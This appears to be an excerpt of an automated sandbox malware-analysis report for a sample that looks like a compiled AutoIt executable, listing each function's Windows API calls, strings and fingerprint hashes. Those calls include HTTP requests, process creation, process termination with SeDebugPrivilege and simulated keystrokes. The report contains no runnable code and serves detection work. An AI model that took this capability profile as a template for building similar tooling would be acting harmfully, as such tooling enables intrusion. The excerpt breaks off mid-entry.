Function 009F1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009F1A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009F1A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009F1ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009F1AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009F1B10
InternetCloseHandle.WININET(00000000), ref: 009F1B57

Part of subcall function 009F2483: GetLastError.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F2498
Part of subcall function 009F2483: SetEvent.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F24AD

Strings

, xrefs: 009F1B01

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 8331d8d38a8688a757b92f440a6bc0c88393720a6af53288ffdb6e2d81f11692
Instruction ID: 5695a2ac484b716dc0198f0fb0b04aea7866033495b64d00658bb8e2d39483f5
Opcode Fuzzy Hash: 8331d8d38a8688a757b92f440a6bc0c88393720a6af53288ffdb6e2d81f11692
Instruction Fuzzy Hash: F5416CB150121CFFEB118F50CC89FBA7BACEB08355F00412AFA05AA155E7B59E458BE5

Function 009F8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A0F910), ref: 009F8D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A0F910), ref: 009F8D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009F8ED6
SysFreeString.OLEAUT32(?), ref: 009F8F00

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 8adf39d1affcf5a75f677aa5b8257b2174044aa372c89f052d9a0f42c1be1543
Instruction ID: aec6b7569a862b353dbea1fab9d6d601c1d4352c08bd4399e35a0e277c97f140
Opcode Fuzzy Hash: 8adf39d1affcf5a75f677aa5b8257b2174044aa372c89f052d9a0f42c1be1543
Instruction Fuzzy Hash: 5AF11971A00209AFDF54EF94C884EBEB7B9FF89314F148458FA15AB251DB31AE46CB50

Function 009FF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009FF6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FF848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FF86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FF8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FF8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009FFA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009FFA7C
CloseHandle.KERNEL32(?), ref: 009FFAAB
CloseHandle.KERNEL32(?), ref: 009FFB22

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: e15e7df0035efaa57278def501e0d03b06d1a6848067c523d7909ee66e9e7e65
Instruction ID: 03725fd0aabe94c5fe6d091b4a6affaf365b0cf2d84d234ae6659b907060ef4b
Opcode Fuzzy Hash: e15e7df0035efaa57278def501e0d03b06d1a6848067c523d7909ee66e9e7e65
Instruction Fuzzy Hash: 10E1B1316043059FCB14EF24C8A1B7ABBE5AF85354F18896DF9999B3A2DB30DC41CB52

Function 009E4CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009E3697,?), ref: 009E468B

Part of subcall function 009E466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009E3697,?), ref: 009E46A4

Part of subcall function 009E4A31: GetFileAttributesW.KERNEL32(?,009E370B), ref: 009E4A32

lstrcmpiW.KERNEL32(?,?), ref: 009E4D40
_wcscmp.LIBCMT ref: 009E4D5A
MoveFileW.KERNEL32(?,?), ref: 009E4D75

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 1e2c1f89c523f907fdd0c94f84adcc49342eab559b6387b7099b5232cd93dbc5
Instruction ID: 322f971fd966e2c25a38d5f0623f458175155e431f8e6fee15bc3e4654b5ce35
Opcode Fuzzy Hash: 1e2c1f89c523f907fdd0c94f84adcc49342eab559b6387b7099b5232cd93dbc5
Instruction Fuzzy Hash: A25152B24083859BC725EBA4DC81ADFB3ECAF85750F40092EF589D3191EE34E588C766

Function 00A08645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A086FF

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: d75acf520d608e0df4329a355c57b38196204998154167d5a43769eddc4cb54b
Instruction ID: ac8a90732e8639cac9ce840676017f704cfd468089ee9de9555ee42e4623854c
Opcode Fuzzy Hash: d75acf520d608e0df4329a355c57b38196204998154167d5a43769eddc4cb54b
Instruction Fuzzy Hash: FC51C53050024CBFDF209B68EC89FAD7BA4FB05764F604111F990E62E1CF7AA991CB58

Function 00982B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009BC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009BC319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009BC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009BC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009BC370
DestroyIcon.USER32(00000000), ref: 009BC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009BC39C
DestroyIcon.USER32(?), ref: 009BC3AB

Part of subcall function 00A0A4AF: DeleteObject.GDI32(00000000), ref: 00A0A4E8

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 205da5a83a88c8747bca741d8fcfa26d55586b6c195d4113775453314c8e3b0b
Instruction ID: 93ee1231c6ea9a64e196e69b0ccd9cd3d0d51972e113a279768e790ac6316ee1
Opcode Fuzzy Hash: 205da5a83a88c8747bca741d8fcfa26d55586b6c195d4113775453314c8e3b0b
Instruction Fuzzy Hash: 5F516974A00209AFDB20EF64CC45FAA7BF9EB59720F104528F952E72A0DB71ED91DB50

Function 009D966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009DA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 009DA84C
Part of subcall function 009DA82C: GetCurrentThreadId.KERNEL32 ref: 009DA853
Part of subcall function 009DA82C: AttachThreadInput.USER32(00000000,?,009D9683,?,00000001), ref: 009DA85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 009D968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009D96AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009D96AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 009D96B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009D96D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D96D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 009D96E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009D96F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009D96FB

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e41ca489800880b9ae454c77c0c264e8b4a277e12e4cb2ad8e034dad660e7417
Instruction ID: 1aab8fe49bba6099345a7a5264ba9ff95b3cd2b9abc2a44b67443734e941fd08
Opcode Fuzzy Hash: e41ca489800880b9ae454c77c0c264e8b4a277e12e4cb2ad8e034dad660e7417
Instruction Fuzzy Hash: 9211CEB1950218BFF620ABA09C89F6A3A2DEB4C750F104426F744AB1A0C9F35C129AA4

Function 009D8921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009D853C,00000B00,?,?), ref: 009D892A
HeapAlloc.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D8931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009D853C,00000B00,?,?), ref: 009D8946
GetCurrentProcess.KERNEL32(?,00000000,?,009D853C,00000B00,?,?), ref: 009D894E
DuplicateHandle.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D8951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009D853C,00000B00,?,?), ref: 009D8961
GetCurrentProcess.KERNEL32(009D853C,00000000,?,009D853C,00000B00,?,?), ref: 009D8969
DuplicateHandle.KERNEL32(00000000,?,009D853C,00000B00,?,?), ref: 009D896C
CreateThread.KERNEL32(00000000,00000000,009D8992,00000000,00000000,00000000), ref: 009D8986

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 49e86fc80761661ff567a568f3f2666af7021e1aed8da476988d3171d0c54639
Instruction ID: 9962b2def6327e1ea956c1fc53e10416d2b5e137d110c0290af3f601086613f2
Opcode Fuzzy Hash: 49e86fc80761661ff567a568f3f2666af7021e1aed8da476988d3171d0c54639
Instruction Fuzzy Hash: E001AC75240308FFE620EBA5DC49F673B6CEB89711F408521FB05DB691CA7098028A20

Function 009F9B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 009F9BA4, 009F9EC8
Not an Object type, xrefs: 009F9B7B

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 7a72efdf5e79057c4b66da01ca573a32106a7da6b099a2cd86b2e31ddb40c290
Instruction ID: 6ba0149a2ad0981fd763900f8a87048d4a3fb4d821dd1aa340136534bcea561d
Opcode Fuzzy Hash: 7a72efdf5e79057c4b66da01ca573a32106a7da6b099a2cd86b2e31ddb40c290
Instruction Fuzzy Hash: 9CC18171A0021E9FDF10DF98D884BBEB7F9BB88314F148469EA45AB281E7719D45CB90

Function 009F9113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009F9167
VariantInit.OLEAUT32(?), ref: 009F9238
VariantInit.OLEAUT32(?), ref: 009F9339
VariantClear.OLEAUT32(?), ref: 009F9343
VariantClear.OLEAUT32(?), ref: 009F93A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 009F931C
Null Object assignment in FOR..IN loop, xrefs: 009F91C8, 009F92F6, 009F93AE

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 19d008528019dd54a503a6f9ed364bc367648dfe021c4cdd584bb00da30ea77a
Instruction ID: 116fe4b1c2b8d42acef0798b36e33a2f2aa6002286b7184b0950e25d4e97fe4c
Opcode Fuzzy Hash: 19d008528019dd54a503a6f9ed364bc367648dfe021c4cdd584bb00da30ea77a
Instruction Fuzzy Hash: 6891B031E00219ABDF24DFA5C888FAEB7B8EF85714F108559F615AB280D7749941CFA0

Function 009F975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 009D710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?,?,009D7455), ref: 009D7127
Part of subcall function 009D710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7142
Part of subcall function 009D710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?,?), ref: 009D7150
Part of subcall function 009D710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,009D7044,80070057,?), ref: 009D7160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009F9806
_memset.LIBCMT ref: 009F9813
_memset.LIBCMT ref: 009F9956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 009F9982
CoTaskMemFree.OLE32(?), ref: 009F998D

Strings

NULL Pointer assignment, xrefs: 009F99DB

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 930a7fc4fa9c8101bd55280c02f8d3325cc6f0adac4f1084eb77a92e65e5bb42
Instruction ID: 5cdb87632205ee63b9d29d0e94eba64c507e877c7a02169d157a28f3b0a7dcc2
Opcode Fuzzy Hash: 930a7fc4fa9c8101bd55280c02f8d3325cc6f0adac4f1084eb77a92e65e5bb42
Instruction Fuzzy Hash: 51911771D0021DEBDB10DFA5DC85BEEBBB9AF48310F20415AF519A7291EB719A44CFA0

Function 00A06D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00A06E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00A06E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00A06E52
_wcscat.LIBCMT ref: 00A06EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00A06EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00A06EF2

Strings

SysListView32, xrefs: 00A06DF6

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 3899da4670c012cfe578500c9d3a6f0d804a8f0a51034efa7a2e1276ae07af02
Instruction ID: 73995219c4a0760af6c037dc382e9e062f013f5a7bca1749b57ce53287b35fa5
Opcode Fuzzy Hash: 3899da4670c012cfe578500c9d3a6f0d804a8f0a51034efa7a2e1276ae07af02
Instruction Fuzzy Hash: 9541A074A0034DAFEB21DFA4DC85BEA77E8EF08354F10082AF584A72D1D6729D958B60

Function 009FE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 009E3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 009E3C7A
Part of subcall function 009E3C55: Process32FirstW.KERNEL32(00000000,?), ref: 009E3C88
Part of subcall function 009E3C55: CloseHandle.KERNEL32(00000000), ref: 009E3D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FE9A4
GetLastError.KERNEL32 ref: 009FE9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 009FE9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 009FEA63
GetLastError.KERNEL32(00000000), ref: 009FEA6E
CloseHandle.KERNEL32(00000000), ref: 009FEAA3

Strings

SeDebugPrivilege, xrefs: 009FE9C2

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 55bd51f55d8a0efa5af796dc2d9cc4c9e717aaf76dfdfb55a32359a920cd20c1
Instruction ID: bc66e8dfbe3b0997a0e92cd19d395d37dc96ef52a9ee6499d62af03da67eb707
Opcode Fuzzy Hash: 55bd51f55d8a0efa5af796dc2d9cc4c9e717aaf76dfdfb55a32359a920cd20c1
Instruction Fuzzy Hash: 9341AB712002059FDB25EF54CCA5F7EB7A5AF84314F188419FA029B3D2CBB4E849CB92

Function 009E2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 009E3033

Strings

blank, xrefs: 009E2FB5
warning, xrefs: 009E301C
stop, xrefs: 009E3004
question, xrefs: 009E2FEC
info, xrefs: 009E2FD4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: a443637f314262ae7ddd14ef97f601f65494f0baecf6918d4fe8249dcdd49036
Instruction ID: 51058834652785f86e496024d0328dabb1c4eae29b6e4b2f9627a448e425f6dd
Opcode Fuzzy Hash: a443637f314262ae7ddd14ef97f601f65494f0baecf6918d4fe8249dcdd49036
Instruction Fuzzy Hash: 78116A313483C6BEE7269B5ADC46D6B779CDF16321F20442AF900A7582DB789F4046A1

Function 009E42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009E4312
LoadStringW.USER32(00000000), ref: 009E4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009E432F
LoadStringW.USER32(00000000), ref: 009E4336
_wprintf.LIBCMT ref: 009E435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 009E437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 009E4357

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 9869fca580084070f4ace39e5f4ffe1d35837d525799d42c4185a1840d1e65ec
Instruction ID: 8ad4723110290dcad18035a42fe3314369c75736066635bdd5c021a5533e9f5d
Opcode Fuzzy Hash: 9869fca580084070f4ace39e5f4ffe1d35837d525799d42c4185a1840d1e65ec
Instruction Fuzzy Hash: AA014FF290024CBFE761D7E0DD89EE7776CEB08300F0005A1BB49E6051EA755E864B71

Function 00A0D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

